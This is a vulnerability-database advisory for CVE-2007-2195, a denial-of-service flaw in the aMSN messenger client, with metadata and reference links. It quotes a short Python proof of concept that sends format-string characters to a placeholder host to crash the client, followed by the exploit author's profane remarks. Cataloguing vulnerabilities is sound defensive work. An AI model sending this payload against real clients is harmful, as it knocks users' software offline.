aMSN Malformed Message Denial-of-Service Vulnerability

Vulnerability ID 1112750 Vulnerability type Other
Published 2007-04-21 Updated 2007-04-25
CVE ID CVE-2007-2195 CNNVD-ID CNNVD-200704-459
Platform Multiple CVSS score 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/29875
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-459
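|Vulnerability details
aMSN is a free, open-source clone of MSN Messenger. aMSN has a denial-of-service vulnerability in its handling of malformed messages, which a remote attacker may be able to exploit to crash the aMSN client. Sending aMSN a specially crafted message containing the characters "}", "{", "%x" or "%n" may crash the client.
|Exploit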
source: http://www.securityfocus.com/bid/23583/info

aMsn is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

This issue affects aMsn 0.96 and prior versions.

import socket

HOST = 'victim.com'
PORT = 31337
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
i = 1
while i <= 3:
   s.send('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\
          ?!"?$%&/()=?`#+#-.,;:_??????%X%X%X%X%X%XXX%X%x%x%x%x%x%x%x%x%x%n%n%n\
          %n%n%n%n%n%n\????#?[{#?]?#\`~??')

---fuck off here---

I think it was the character '}', '{' or '%x', '%n'. Try to determine this for
yourself! Don't bug me with this shit.

/* Vendor contacted? */
NO! Why should I contact them? :) lol, go away and contact them yourself.

/* EOF */
|References

Source: MISC
Link: http://www.securityfocus.com/data/vulnerabilities/exploits/23583.c
Source: BID
Name: 23583
Link: http://www.securityfocus.com/bid/23583
Source: OSVDB
Name: 39116
Link: http://osvdb.org/39116